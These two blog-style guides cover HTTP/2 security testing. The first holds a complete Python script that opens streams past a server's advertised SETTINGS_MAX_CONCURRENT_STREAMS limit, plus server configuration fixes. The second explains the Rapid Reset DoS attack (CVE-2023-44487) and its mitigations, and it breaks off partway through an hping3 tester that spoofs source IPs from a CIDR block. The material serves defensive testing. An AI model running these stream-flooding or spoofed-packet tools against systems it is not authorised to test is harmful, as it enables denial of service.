Testing Maximum HTTP/2 Concurrent Streams for Your Website

1. Introduction

Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.

This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, which is a critical defense mechanism.

2. Why Test Stream Limits?

The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:

  1. Security validation: Confirms your server enforces reasonable stream limits
  2. Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
  3. Performance tuning: Helps optimize the balance between throughput and resource consumption
  4. Attack surface assessment: Identifies if servers accept dangerously high stream counts

3. Understanding HTTP/2 Stream Limits

When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:

SETTINGS_MAX_CONCURRENT_STREAMS: 100

This tells the client the maximum number of concurrent streams allowed. A compliant client should respect this limit, but attackers will not.

3.1. Common Default Values

Web Servers:

  • Nginx: 128 (configurable via http2_max_concurrent_streams)
  • Apache: 100 (configurable via H2MaxSessionStreams)
  • Caddy: 250 (configurable via max_concurrent_streams)
  • LiteSpeed: 100 (configurable in admin panel)

Reverse Proxies and Load Balancers:

  • HAProxy: No default limit (should be explicitly configured)
  • Envoy: 100 (configurable via max_concurrent_streams)
  • Traefik: 250 (configurable via maxConcurrentStreams)

CDN and Cloud Services:

  • CloudFlare: 128 (managed automatically)
  • AWS ALB: 128 (managed automatically)
  • Azure Front Door: 100 (managed automatically)

4. The Stream Limit Testing Script

The following Python script tests your server’s maximum concurrent streams using the h2 library. This script will:

  • Connect to your HTTP/2 server
  • Read the advertised SETTINGS_MAX_CONCURRENT_STREAMS value
  • Attempt to open more streams than the advertised limit
  • Verify that the server actually enforces the limit
  • Provide detailed results and recommendations

4.1. Prerequisites

Install the required Python libraries:

pip3 install h2 hyper --break-system-packages

Verify installation:

python3 -c "import h2; print(f'h2 version: {h2.__version__}')"

4.2. Complete Script

Save the following as http2_stream_limit_tester.py:

#!/usr/bin/env python3
"""
HTTP/2 Maximum Concurrent Streams Tester

Tests the SETTINGS_MAX_CONCURRENT_STREAMS limit on HTTP/2 servers
and attempts to exceed it to verify enforcement.

Usage:
    python3 http2_stream_limit_tester.py --host example.com --port 443

Requirements:
    pip3 install h2 hyper --break-system-packages
"""

import argparse
import socket
import ssl
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, field

try:
    from h2.connection import H2Connection
    from h2.config import H2Configuration
    from h2.events import (
        RemoteSettingsChanged,
        StreamEnded,
        DataReceived,
        StreamReset,
        WindowUpdated,
        SettingsAcknowledged,
        ResponseReceived
    )
    from h2.exceptions import ProtocolError
except ImportError:
    print("Error: h2 library not installed")
    print("Install with: pip3 install h2 hyper --break-system-packages")
    exit(1)


@dataclass
class StreamLimitTestResults:
    """Results from stream limit testing"""
    advertised_max_streams: Optional[int] = None
    actual_max_streams: int = 0
    successful_streams: int = 0
    failed_streams: int = 0
    reset_streams: int = 0
    enforcement_detected: bool = False
    test_duration: float = 0.0
    server_settings: Dict = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


class HTTP2StreamLimitTester:
    """Test HTTP/2 server stream limits"""

    def __init__(
        self,
        host: str,
        port: int = 443,
        path: str = "/",
        use_tls: bool = True,
        timeout: int = 30,
        verbose: bool = False
    ):
        self.host = host
        self.port = port
        self.path = path
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose

        self.socket: Optional[socket.socket] = None
        self.h2_conn: Optional[H2Connection] = None
        self.server_max_streams: Optional[int] = None
        self.active_streams: Dict[int, dict] = {}

    def connect(self) -> bool:
        """Establish connection to the server"""
        try:
            # Create socket
            self.socket = socket.create_connection(
                (self.host, self.port),
                timeout=self.timeout
            )

            # Wrap with TLS if needed
            if self.use_tls:
                context = ssl.create_default_context()
                context.check_hostname = True
                context.verify_mode = ssl.CERT_REQUIRED

                # Set ALPN protocols for HTTP/2
                context.set_alpn_protocols(['h2', 'http/1.1'])

                self.socket = context.wrap_socket(
                    self.socket,
                    server_hostname=self.host
                )

                # Verify HTTP/2 was negotiated
                negotiated_protocol = self.socket.selected_alpn_protocol()
                if negotiated_protocol != 'h2':
                    raise Exception(f"HTTP/2 not negotiated. Got: {negotiated_protocol}")

                if self.verbose:
                    print(f"TLS connection established (ALPN: {negotiated_protocol})")

            # Initialize HTTP/2 connection
            config = H2Configuration(client_side=True)
            self.h2_conn = H2Connection(config=config)
            self.h2_conn.initiate_connection()

            # Send connection preface
            self.socket.sendall(self.h2_conn.data_to_send())

            # Receive server settings
            self._receive_data()

            if self.verbose:
                print(f"HTTP/2 connection established to {self.host}:{self.port}")

            return True

        except Exception as e:
            if self.verbose:
                print(f"Connection failed: {e}")
            return False

    def _receive_data(self, timeout: Optional[float] = None) -> List:
        """Receive and process data from server"""
        if timeout:
            self.socket.settimeout(timeout)
        else:
            self.socket.settimeout(self.timeout)

        events = []
        try:
            data = self.socket.recv(65536)
            if not data:
                return events

            events_received = self.h2_conn.receive_data(data)

            for event in events_received:
                events.append(event)

                if isinstance(event, RemoteSettingsChanged):
                    self._handle_settings(event)
                elif isinstance(event, ResponseReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Response received")
                elif isinstance(event, DataReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Data received ({len(event.data)} bytes)")
                elif isinstance(event, StreamEnded):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Ended normally")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['ended'] = True
                elif isinstance(event, StreamReset):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Reset (error code: {event.error_code})")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['reset'] = True

            # Send any pending data
            data_to_send = self.h2_conn.data_to_send()
            if data_to_send:
                self.socket.sendall(data_to_send)

        except socket.timeout:
            pass
        except Exception as e:
            if self.verbose:
                print(f"Error receiving data: {e}")

        return events

    def _handle_settings(self, event: RemoteSettingsChanged):
        """Handle server settings"""
        for setting, value in event.changed_settings.items():
            setting_name = setting.name if hasattr(setting, 'name') else str(setting)

            if self.verbose:
                print(f"  Server setting: {setting_name} = {value}")

            # Check for MAX_CONCURRENT_STREAMS
            if 'MAX_CONCURRENT_STREAMS' in setting_name:
                self.server_max_streams = value
                if self.verbose:
                    print(f"Server advertises max concurrent streams: {value}")

    def send_stream_request(self, stream_id: int) -> bool:
        """Send a GET request on a specific stream"""
        try:
            headers = [
                (':method', 'GET'),
                (':path', self.path),
                (':scheme', 'https' if self.use_tls else 'http'),
                (':authority', self.host),
                ('user-agent', 'HTTP2-Stream-Limit-Tester/1.0'),
            ]

            self.h2_conn.send_headers(stream_id, headers, end_stream=True)
            data_to_send = self.h2_conn.data_to_send()

            if data_to_send:
                self.socket.sendall(data_to_send)

            self.active_streams[stream_id] = {
                'sent': time.time(),
                'ended': False,
                'reset': False
            }

            return True

        except ProtocolError as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Protocol error - {e}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"  Stream {stream_id}: Failed to send - {e}")
            return False

    def test_concurrent_streams(
        self,
        max_streams_to_test: int = 200,
        batch_size: int = 10,
        delay_between_batches: float = 0.1
    ) -> StreamLimitTestResults:
        """
        Test maximum concurrent streams by opening multiple streams

        Args:
            max_streams_to_test: Maximum number of streams to attempt
            batch_size: Number of streams to open per batch
            delay_between_batches: Delay in seconds between batches
        """
        results = StreamLimitTestResults()
        start_time = time.time()

        print(f"\nTesting HTTP/2 Stream Limits:")
        print(f"  Target: {self.host}:{self.port}")
        print(f"  Max streams to test: {max_streams_to_test}")
        print(f"  Batch size: {batch_size}")
        print("=" * 60)

        try:
            # Connect and get initial settings
            if not self.connect():
                results.errors.append("Failed to establish connection")
                return results

            results.advertised_max_streams = self.server_max_streams

            if self.server_max_streams:
                print(f"\nServer advertised limit: {self.server_max_streams} concurrent streams")
            else:
                print(f"\nServer did not advertise MAX_CONCURRENT_STREAMS limit")

            # Start opening streams in batches
            stream_id = 1  # HTTP/2 client streams use odd numbers
            streams_opened = 0

            while streams_opened < max_streams_to_test:
                batch_count = min(batch_size, max_streams_to_test - streams_opened)

                print(f"\nOpening batch of {batch_count} streams (total: {streams_opened + batch_count})...")

                for _ in range(batch_count):
                    if self.send_stream_request(stream_id):
                        results.successful_streams += 1
                        streams_opened += 1
                    else:
                        results.failed_streams += 1

                    stream_id += 2  # Increment by 2 (odd numbers only)

                # Process any responses
                self._receive_data(timeout=0.5)

                # Check for resets
                reset_count = sum(1 for s in self.active_streams.values() if s.get('reset', False))
                if reset_count > results.reset_streams:
                    new_resets = reset_count - results.reset_streams
                    results.reset_streams = reset_count
                    print(f"  WARNING: {new_resets} stream(s) were reset by server")

                    # If we're getting lots of resets, enforcement is happening
                    if reset_count > (results.successful_streams * 0.1):
                        results.enforcement_detected = True
                        print(f"  Stream limit enforcement detected")

                # Small delay between batches
                if delay_between_batches > 0 and streams_opened < max_streams_to_test:
                    time.sleep(delay_between_batches)

            # Final data reception
            print(f"\nWaiting for final responses...")
            for _ in range(5):
                self._receive_data(timeout=1.0)

            # Calculate actual max streams achieved
            results.actual_max_streams = results.successful_streams - results.reset_streams

        except Exception as e:
            results.errors.append(f"Test error: {str(e)}")
            if self.verbose:
                import traceback
                traceback.print_exc()

        finally:
            results.test_duration = time.time() - start_time
            self.close()

        return results

    def display_results(self, results: StreamLimitTestResults):
        """Display test results"""
        print("\n" + "=" * 60)
        print("STREAM LIMIT TEST RESULTS")
        print("=" * 60)

        print(f"\nServer Configuration:")
        print(f"  Advertised max streams:  {results.advertised_max_streams or 'Not specified'}")

        print(f"\nTest Statistics:")
        print(f"  Successful stream opens: {results.successful_streams}")
        print(f"  Failed stream opens:     {results.failed_streams}")
        print(f"  Streams reset by server: {results.reset_streams}")
        print(f"  Actual max achieved:     {results.actual_max_streams}")
        print(f"  Test duration:           {results.test_duration:.2f}s")

        print(f"\nEnforcement:")
        if results.enforcement_detected:
            print(f"  Stream limit enforcement: DETECTED")
        else:
            print(f"  Stream limit enforcement: NOT DETECTED")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        # Provide recommendations
        if results.advertised_max_streams and results.advertised_max_streams > 128:
            print(f"\nWARNING: Advertised limit ({results.advertised_max_streams}) exceeds recommended maximum (128)")
            print("  Consider reducing http2_max_concurrent_streams")
        elif results.advertised_max_streams and results.advertised_max_streams <= 128:
            print(f"\nAdvertised limit ({results.advertised_max_streams}) is within recommended range")

        if not results.enforcement_detected and results.actual_max_streams > 150:
            print(f"\nWARNING: Opened {results.actual_max_streams} streams without enforcement")
            print("  Server may be vulnerable to stream exhaustion attacks")
        elif results.enforcement_detected:
            print(f"\nServer actively enforces stream limits")
            print("  Stream limit protection is working correctly")

        if results.errors:
            print(f"\nErrors encountered:")
            for error in results.errors:
                print(f"  {error}")

        print("=" * 60 + "\n")

    def close(self):
        """Close the connection"""
        try:
            if self.h2_conn:
                self.h2_conn.close_connection()
                if self.socket:
                    data_to_send = self.h2_conn.data_to_send()
                    if data_to_send:
                        self.socket.sendall(data_to_send)

            if self.socket:
                self.socket.close()

            if self.verbose:
                print("Connection closed")
        except Exception as e:
            if self.verbose:
                print(f"Error closing connection: {e}")


def main():
    parser = argparse.ArgumentParser(
        description='Test HTTP/2 server maximum concurrent streams',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test
  python3 http2_stream_limit_tester.py --host example.com

  # Test with custom parameters
  python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

  # Verbose output
  python3 http2_stream_limit_tester.py --host example.com --verbose

  # Test specific path
  python3 http2_stream_limit_tester.py --host example.com --path /api/health

  # Test non-TLS HTTP/2 (h2c)
  python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Prerequisites:
  pip3 install h2 hyper --break-system-packages
        """
    )

    parser.add_argument('--host', required=True, help='Target hostname')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--path', default='/', help='Request path (default: /)')
    parser.add_argument('--no-tls', action='store_true', help='Disable TLS (for h2c testing)')
    parser.add_argument('--max-streams', type=int, default=200,
                       help='Maximum streams to test (default: 200)')
    parser.add_argument('--batch', type=int, default=10,
                       help='Streams per batch (default: 10)')
    parser.add_argument('--delay', type=float, default=0.1,
                       help='Delay between batches in seconds (default: 0.1)')
    parser.add_argument('--timeout', type=int, default=30,
                       help='Connection timeout in seconds (default: 30)')
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    print("=" * 60)
    print("HTTP/2 Maximum Concurrent Streams Tester")
    print("=" * 60)

    tester = HTTP2StreamLimitTester(
        host=args.host,
        port=args.port,
        path=args.path,
        use_tls=not args.no_tls,
        timeout=args.timeout,
        verbose=args.verbose
    )

    try:
        results = tester.test_concurrent_streams(
            max_streams_to_test=args.max_streams,
            batch_size=args.batch,
            delay_between_batches=args.delay
        )

        tester.display_results(results)

    except KeyboardInterrupt:
        print("\n\nTest interrupted by user")
    except Exception as e:
        print(f"\nFatal error: {e}")
        if args.verbose:
            import traceback
            traceback.print_exc()


if __name__ == '__main__':
    main()

5. Using the Script

5.1. Basic Usage

Test your server with default settings:

python3 http2_stream_limit_tester.py --host example.com

5.2. Advanced Examples

Test with increased stream count:

python3 http2_stream_limit_tester.py --host example.com --max-streams 300 --batch 20

Verbose output for debugging:

python3 http2_stream_limit_tester.py --host example.com --verbose

Test specific API endpoint:

python3 http2_stream_limit_tester.py --host api.example.com --path /v1/health

Test non-TLS HTTP/2 (h2c):

python3 http2_stream_limit_tester.py --host localhost --port 8080 --no-tls

Gradual escalation test:

# Start conservative
python3 http2_stream_limit_tester.py --host example.com --max-streams 50

# Increase if server handles well
python3 http2_stream_limit_tester.py --host example.com --max-streams 100

# Push to limits
python3 http2_stream_limit_tester.py --host example.com --max-streams 200

Fast burst test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 150 --batch 30 --delay 0.01

Slow ramp test:

python3 http2_stream_limit_tester.py --host example.com --max-streams 200 --batch 5 --delay 0.5

6. Understanding the Results

The script provides detailed output including:

  1. Advertised max streams: What the server claims to support
  2. Successful stream opens: How many streams were successfully created
  3. Failed stream opens: Streams that failed to open
  4. Streams reset by server: Streams terminated by the server (enforcement)
  5. Actual max achieved: The real concurrent stream limit

6.1. Example Output

Testing HTTP/2 Stream Limits:
  Target: example.com:443
  Max streams to test: 200
  Batch size: 10
============================================================

Server advertised limit: 128 concurrent streams

Opening batch of 10 streams (total: 10)...
Opening batch of 10 streams (total: 20)...
Opening batch of 10 streams (total: 130)...
  WARNING: 5 stream(s) were reset by server
  Stream limit enforcement detected

============================================================
STREAM LIMIT TEST RESULTS
============================================================

Server Configuration:
  Advertised max streams:  128

Test Statistics:
  Successful stream opens: 130
  Failed stream opens:     0
  Streams reset by server: 5
  Actual max achieved:     125
  Test duration:           3.45s

Enforcement:
  Stream limit enforcement: DETECTED

============================================================
ASSESSMENT
============================================================

Advertised limit (128) is within recommended range
Server actively enforces stream limits
  Stream limit protection is working correctly
============================================================

7. Interpreting Different Scenarios

7.1. Scenario 1: Proper Enforcement

Advertised max streams:  100
Successful stream opens: 105
Streams reset by server: 5
Actual max achieved:     100
Stream limit enforcement: DETECTED

Analysis: Server properly enforces the limit. Configuration is working exactly as expected.

7.2. Scenario 2: No Enforcement

Advertised max streams:  128
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server accepts far more streams than advertised. This is a potential vulnerability that should be investigated.

7.3. Scenario 3: No Advertised Limit

Advertised max streams:  Not specified
Successful stream opens: 200
Streams reset by server: 0
Actual max achieved:     200
Stream limit enforcement: NOT DETECTED

Analysis: Server does not advertise or enforce limits. High risk configuration that requires immediate remediation.

7.4. Scenario 4: Conservative Limit

Advertised max streams:  50
Successful stream opens: 55
Streams reset by server: 5
Actual max achieved:     50
Stream limit enforcement: DETECTED

Analysis: Very conservative limit. Good for security but may impact performance for legitimate high-throughput applications.

8. Monitoring During Testing

8.1. Server Side Monitoring

While running tests, monitor your server for resource utilization and connection metrics.

Monitor connection states:

netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

Count active connections:

netstat -an | grep ESTABLISHED | wc -l

Count SYN_RECV connections:

netstat -an | grep SYN_RECV | wc -l

Monitor system resources:

top -l 1 | head -10

8.2. Web Server Specific Monitoring

For Nginx, watch active connections:

watch -n 1 'curl -s http://localhost/nginx_status | grep Active'

For Apache, monitor server status:

watch -n 1 'curl -s http://localhost/server-status | grep requests'

Check HTTP/2 connections:

netstat -an | grep :443 | grep ESTABLISHED | wc -l

Monitor stream counts (if your server exposes this metric):

curl -s http://localhost:9090/metrics | grep http2_streams

Monitor CPU and memory:

top -l 1 | grep -E "CPU|PhysMem"

Check file descriptors:

lsof -i :443 | wc -l

8.3. Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

8.4. Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

9. Remediation Steps

If your tests reveal issues, apply these configuration fixes:

9.1. Nginx Configuration

http {
    # Set conservative concurrent stream limit
    http2_max_concurrent_streams 100;

    # Additional protections
    http2_recv_timeout 10s;
    http2_idle_timeout 30s;
    http2_max_field_size 16k;
    http2_max_header_size 32k;
}

9.2. Apache Configuration

Set in httpd.conf or virtual host configuration:

# Set maximum concurrent streams
H2MaxSessionStreams 100

# Additional HTTP/2 settings
H2StreamTimeout 10
H2MinWorkers 10
H2MaxWorkers 150
H2StreamMaxMemSize 65536

9.3. HAProxy Configuration

defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend fe_main
    bind :443 ssl crt /path/to/cert.pem alpn h2,http/1.1

    # Limit streams per connection
    http-request track-sc0 src table connection_limit
    http-request deny if { sc_conn_cur(0) gt 100 }

9.4. Envoy Configuration

static_resources:
  listeners:
  - name: listener_0
    address:
      socket_address:
        address: 0.0.0.0
        port_value: 443
    filter_chains:
    - filters:
      - name: envoy.filters.network.http_connection_manager
        typed_config:
          "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager
          http2_protocol_options:
            max_concurrent_streams: 100
            initial_stream_window_size: 65536
            initial_connection_window_size: 1048576

9.5. Caddy Configuration

example.com {
    encode gzip

    # HTTP/2 settings
    protocol {
        experimental_http3
        max_concurrent_streams 100
    }

    reverse_proxy localhost:8080
}

10. Combining with Rapid Reset Testing

You can use both the stream limit tester and the Rapid Reset tester together for comprehensive HTTP/2 security assessment:

# Step 1: Test stream limits
python3 http2_stream_limit_tester.py --host example.com

# Step 2: Test rapid reset with IP spoofing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 1000

# Step 3: Re-test stream limits to verify no degradation
python3 http2_stream_limit_tester.py --host example.com

11. Security Best Practices

11.1. Configuration Guidelines

  1. Set explicit limits: Never rely on default values
  2. Use conservative values: 100-128 streams is the recommended range
  3. Monitor enforcement: Regularly verify that limits are actually being enforced
  4. Document settings: Maintain records of your stream limit configuration
  5. Test after changes: Always test after configuration modifications

11.2. Defense in Depth

Stream limits should be one layer in a comprehensive security strategy:

  1. Stream limits: Prevent excessive concurrent streams per connection
  2. Connection limits: Limit total connections per IP address
  3. Request rate limiting: Throttle requests per second
  4. Resource quotas: Set memory and CPU limits
  5. WAF/DDoS protection: Use cloud-based or on-premise DDoS mitigation

11.3. Regular Testing Schedule

Establish a regular testing schedule:

  • Weekly: Automated basic stream limit tests
  • Monthly: Comprehensive security testing including Rapid Reset
  • After changes: Always test after configuration or infrastructure changes
  • Quarterly: Full security audit including penetration testing

12. Troubleshooting

12.1. Common Errors

Error: “SSL: CERTIFICATE_VERIFY_FAILED”

This occurs when testing against servers with self-signed certificates. For testing purposes only, you can modify the script to skip certificate verification (not recommended for production testing).

Error: “h2 library not installed”

Install the required library:

pip3 install h2 hyper --break-system-packages

Error: “Connection refused”

Verify the port is open:

telnet example.com 443

Check if HTTP/2 is enabled:

curl -I --http2 https://example.com

Error: “HTTP/2 not negotiated”

The server may not support HTTP/2. Verify with:

curl -I --http2 https://example.com | grep -i http/2

12.2. No Streams Being Reset

If streams are not being reset despite exceeding the advertised limit:

  • Server may not be enforcing limits properly
  • Configuration may not have been applied (restart required)
  • Server may be using a different enforcement mechanism
  • Limits may be set at a different layer (load balancer vs web server)

12.3. High Failure Rate

If many streams fail to open:

  • Network connectivity issues
  • Firewall blocking requests
  • Server resource exhaustion
  • Rate limiting triggering prematurely

13. Understanding the Attack Surface

When testing your infrastructure, consider all HTTP/2 endpoints:

  1. Web servers: Nginx, Apache, IIS
  2. Load balancers: HAProxy, Envoy, ALB
  3. API gateways: Kong, Tyk, AWS API Gateway
  4. CDN endpoints: CloudFlare, Fastly, Akamai
  5. Reverse proxies: Traefik, Caddy

13.1. Testing Strategy

Test at multiple layers:

# Test CDN edge
python3 http2_stream_limit_tester.py --host cdn.example.com

# Test load balancer directly
python3 http2_stream_limit_tester.py --host lb.example.com

# Test origin server
python3 http2_stream_limit_tester.py --host origin.example.com

14. Conclusion

Testing your HTTP/2 maximum concurrent streams configuration is essential for maintaining a secure and performant web infrastructure. This tool allows you to:

  • Verify that your server advertises appropriate stream limits
  • Confirm that advertised limits are actually enforced
  • Identify misconfigurations before they can be exploited
  • Tune performance while maintaining security

Regular testing, combined with proper configuration and monitoring, will help protect your infrastructure against HTTP/2-based attacks while maintaining optimal performance for legitimate users.

15. Additional Resources


This guide and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.

0
0

Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS

Introduction

In August 2023, a critical zero day vulnerability in the HTTP/2 protocol was disclosed that affected virtually every HTTP/2 capable web server and proxy. Known as HTTP/2 Rapid Reset (CVE 2023 44487), this vulnerability enabled attackers to launch devastating Distributed Denial of Service (DDoS) attacks with minimal resources. Google reported mitigating the largest DDoS attack ever recorded at the time (398 million requests per second) leveraging this technique.

Understanding this vulnerability and knowing how to test your infrastructure against it is crucial for maintaining a secure and resilient web presence. This guide provides a flexible testing tool specifically designed for macOS that uses hping3 for packet crafting with CIDR based source IP address spoofing capabilities.

What is HTTP/2 Rapid Reset?

The HTTP/2 Protocol Foundation

HTTP/2 introduced multiplexing, allowing multiple streams (requests/responses) to be sent concurrently over a single TCP connection. Each stream has a unique identifier and can be independently managed. To cancel a stream, HTTP/2 uses the RST_STREAM frame, which immediately terminates the stream and signals that no further processing is needed.

The Vulnerability Mechanism

The HTTP/2 Rapid Reset attack exploits the asymmetry between client cost and server cost:

  • Client cost: Sending a request followed immediately by a RST_STREAM frame is computationally trivial
  • Server cost: Processing the incoming request (parsing headers, routing, backend queries) consumes significant resources before the cancellation is received

An attacker can:

  1. Open an HTTP/2 connection
  2. Send thousands of requests with incrementing stream IDs
  3. Immediately cancel each request with RST_STREAM frames
  4. Repeat this cycle at extremely high rates

The server receives these requests and begins processing them. Even though the cancellation arrives milliseconds later, the server has already invested CPU, memory, and I/O resources. By sending millions of request cancel pairs per second, attackers can exhaust server resources with minimal bandwidth.

Why It’s So Effective

Traditional rate limiting and DDoS mitigation techniques struggle against Rapid Reset attacks because:

  • Low bandwidth usage: The attack uses minimal data (mostly HTTP/2 frames with small headers)
  • Valid protocol behavior: RST_STREAM is a legitimate HTTP/2 mechanism
  • Connection reuse: Attackers multiplex thousands of streams over relatively few connections
  • Amplification: Each cheap client operation triggers expensive server side processing

How to Guard Against HTTP/2 Rapid Reset

1. Update Your Software Stack

Immediate Priority: Ensure all HTTP/2 capable components are patched:

Web Servers:

  • Nginx 1.25.2+ or 1.24.1+
  • Apache HTTP Server 2.4.58+
  • Caddy 2.7.4+
  • LiteSpeed 6.0.12+

Reverse Proxies and Load Balancers:

  • HAProxy 2.8.2+ or 2.6.15+
  • Envoy 1.27.0+
  • Traefik 2.10.5+

CDN and Cloud Services:

  • CloudFlare (auto patched August 2023)
  • AWS ALB/CloudFront (patched)
  • Azure Front Door (patched)
  • Google Cloud Load Balancer (patched)

Application Servers:

  • Tomcat 10.1.13+, 9.0.80+
  • Jetty 12.0.1+, 11.0.16+, 10.0.16+
  • Node.js 20.8.0+, 18.18.0+

2. Implement Stream Limits

Configure strict limits on HTTP/2 stream behavior:

# Nginx configuration
http2_max_concurrent_streams 128;
http2_recv_timeout 10s;
# Apache HTTP Server
H2MaxSessionStreams 100
H2StreamTimeout 10
# HAProxy configuration
defaults
    timeout http-request 10s
    timeout http-keep-alive 10s

frontend https-in
    option http-use-htx
    http-request track-sc0 src
    http-request deny if { sc_http_req_rate(0) gt 100 }

3. Deploy Rate Limiting

Implement multi layered rate limiting:

Connection level limits:

limit_conn_zone $binary_remote_addr zone=addr:10m;
limit_conn addr 10;  # Max 10 concurrent connections per IP

Request level limits:

limit_req_zone $binary_remote_addr zone=req_limit:10m rate=50r/s;
limit_req zone=req_limit burst=20 nodelay;

Stream cancellation tracking:

# Newer Nginx versions track RST_STREAM rates
http2_max_concurrent_streams 100;
http2_max_field_size 16k;
http2_max_header_size 32k;

4. Infrastructure Level Protections

Use a WAF or DDoS Protection Service:

  • CloudFlare (includes Rapid Reset protection)
  • AWS Shield Advanced
  • Azure DDoS Protection Standard
  • Imperva/Akamai

Enable Connection Draining:

# Gracefully handle connection resets
http2_recv_buffer_size 256k;
keepalive_timeout 60s;
keepalive_requests 100;

5. Monitoring and Alerting

Track critical metrics:

  • HTTP/2 stream reset rates
  • Concurrent stream counts per connection
  • Request cancellation patterns
  • CPU and memory usage spikes
  • Unusual traffic patterns from specific IPs

Example Prometheus query:

rate(nginx_http_requests_total{status="499"}[5m]) > 100

6. Consider HTTP/2 Disabling (Temporary Measure)

If you cannot immediately patch:

# Nginx: Disable HTTP/2 temporarily
listen 443 ssl;  # Remove http2 parameter
# Apache: Disable HTTP/2 module
# a2dismod http2

Note: This reduces performance benefits but eliminates the vulnerability.

Testing Script for HTTP/2 Rapid Reset Vulnerabilities on macOS

Below is a parameterized Python script that tests your web servers using hping3 for packet crafting. This script is specifically optimized for macOS and can spoof source IP addresses from a CIDR block to simulate distributed attacks. Using hping3 ensures IP spoofing works consistently across different network environments.

Prerequisites for macOS

Installation Steps:

# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install hping3
brew install hping

Note: This script requires root/sudo privileges for packet crafting and IP spoofing.

The Testing Script

cat > http2rapidresettester_macos.py << 'EOF'

#!/usr/bin/env python3
"""
HTTP/2 Rapid Reset Vulnerability Tester for macOS
Tests web servers for susceptibility to CVE-2023-44487
Uses hping3 for packet crafting with source IP spoofing from CIDR block

Usage:
    sudo python3 http2rapidresettester_macos.py --host example.com --port 443 --cidr 192.168.1.0/24 --packets 1000

Requirements:
    brew install hping
"""

import argparse
import subprocess
import random
import ipaddress
import time
import sys
import os
import platform
from typing import List, Optional

class HTTP2RapidResetTester:
    def __init__(
        self,
        host: str,
        port: int = 443,
        cidr_block: str = None,
        timeout: int = 30,
        verbose: bool = False,
        interface: str = None
    ):
        self.host = host
        self.port = port
        self.cidr_block = cidr_block
        self.timeout = timeout
        self.verbose = verbose
        self.interface = interface
        self.source_ips: List[str] = []

        # Verify running on macOS
        if platform.system() != 'Darwin':
            print("WARNING: This script is optimized for macOS")

        if not self.check_hping3():
            raise RuntimeError("hping3 is not installed. Install with: brew install hping")

        if not self.check_root():
            raise RuntimeError("This script requires root privileges (use sudo)")

        if cidr_block:
            self.generate_source_ips()
            
        if interface:
            self.verify_interface()

    def check_hping3(self) -> bool:
        """Check if hping3 is installed"""
        try:
            result = subprocess.run(
                ['which', 'hping3'],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode == 0:
                return True

            # Try alternative hping command
            result = subprocess.run(
                ['which', 'hping'],
                capture_output=True,
                text=True,
                timeout=5
            )
            return result.returncode == 0
        except Exception as e:
            print(f"Error checking for hping3: {e}")
            return False

    def check_root(self) -> bool:
        """Check if running with root privileges"""
        return os.geteuid() == 0

    def verify_interface(self):
        """Verify that the specified network interface exists"""
        try:
            result = subprocess.run(
                ['ifconfig', self.interface],
                capture_output=True,
                text=True,
                timeout=5
            )
            if result.returncode != 0:
                raise RuntimeError(f"Network interface '{self.interface}' not found")
            
            if self.verbose:
                print(f"Using network interface: {self.interface}")
                
        except subprocess.TimeoutExpired:
            raise RuntimeError(f"Timeout verifying interface '{self.interface}'")
        except FileNotFoundError:
            raise RuntimeError("ifconfig command not found")

    def generate_source_ips(self):
        """Generate list of IP addresses from CIDR block"""
        try:
            network = ipaddress.ip_network(self.cidr_block, strict=False)
            self.source_ips = [str(ip) for ip in network.hosts()]

            if len(self.source_ips) == 0:
                # Handle /32 or /31 networks
                self.source_ips = [str(ip) for ip in network]

            print(f"Generated {len(self.source_ips)} source IPs from {self.cidr_block}")

        except ValueError as e:
            print(f"Invalid CIDR block: {e}")
            sys.exit(1)

    def get_random_source_ip(self) -> Optional[str]:
